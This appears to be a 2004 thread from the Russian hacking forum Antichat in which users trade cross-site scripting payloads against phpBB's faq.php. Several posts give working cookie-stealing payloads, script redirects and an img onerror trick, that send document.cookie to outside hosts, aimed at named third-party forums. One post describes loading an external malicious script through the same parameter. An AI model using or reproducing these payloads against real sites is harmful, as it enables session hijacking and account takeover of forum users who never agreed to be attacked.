Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Кто рубит в xss! (https://forum.antichat.xyz/showthread.php?t=3103)

virgoz 30.10.2004 00:46

Решил попробовать взломать свой форум на phpBB с помощью xss-уязвимости (для sql-баги, нужно чтобы была возможность пересылать приваты, а это есть не везде). Долго мучался, но так нефига и не получилось. Если вводить так(брал любую описанную xss-багу):<script&gt;document.location=&quot;http://www.asd.as/as.php?xack=&quot;+docu...lt;/script&gt;, то скрипт добавляет слеши перед каждой ковычкой. А если так (в 10'ой кодировке):<script&gt;document.location&a mp;#61&amp;#34www.asd.as/as.php?xack&amp;#61&amp;#34&amp;#43document.cookie &lt;/script&gt;, то строка выполняется только до &quot;<script&gt;document.location=&quot; и соответственно нарушается синтаксиc штмл, и весь остальной код не воспроизводится. Объясните где логика?
PS Кто нибудь слышал про движок textus? Есть ли там уязвимости?

Algol 30.10.2004 01:14

Я что-то не понял, каким образом ты вставляешь этот скрипт в форум ?

virgoz 30.10.2004 18:07

Вот так:
http://www.[target].ty/faq.php....1]=test

Algol 31.10.2004 00:34

Вот так работает

http://www.spb-mebel.ru/phpbb/faq.php?faq[0][0]=te):<img src="" sss=http://antichat.ru/cgi-bin/s.jpg? onerror=document.location=this.sss%2Bdocument.cook ie>st&amp;faq[0][1]=test

CoTT 02.11.2004 21:13

а в каких версиях PHPbb это работает?
вот тут: www.rimspb.ru/forum/ например не пашет...

Pengo 07.11.2004 01:10

в разных...

http://forum.jamer.net/faq.php....]=Pengo

PEPSICOLA 25.11.2004 13:57

Куда этот пингвин пропал.... Наверно обиделся что я его рэпером называл =)))

ля-ля 25.11.2004 20:52

Цитата:

Сообщение от PEPSICOLA
Куда этот пингвин пропал.... Наверно обиделся что я его рэпером называл =)))

А при чём тут он?????? :confused: :D

PEPSICOLA 26.11.2004 03:04

Мне его так не хватает... :( ... :D

TaskFall 24.12.2004 16:32

Я тоже с этим мучился - без кавычек - кукисы не спереть =(
я решил это так:
Просто выполнялся скрипт не из url'а, а из файла faq[0][0]=<script src=\localhost/bad.js></script>


Время: 17:19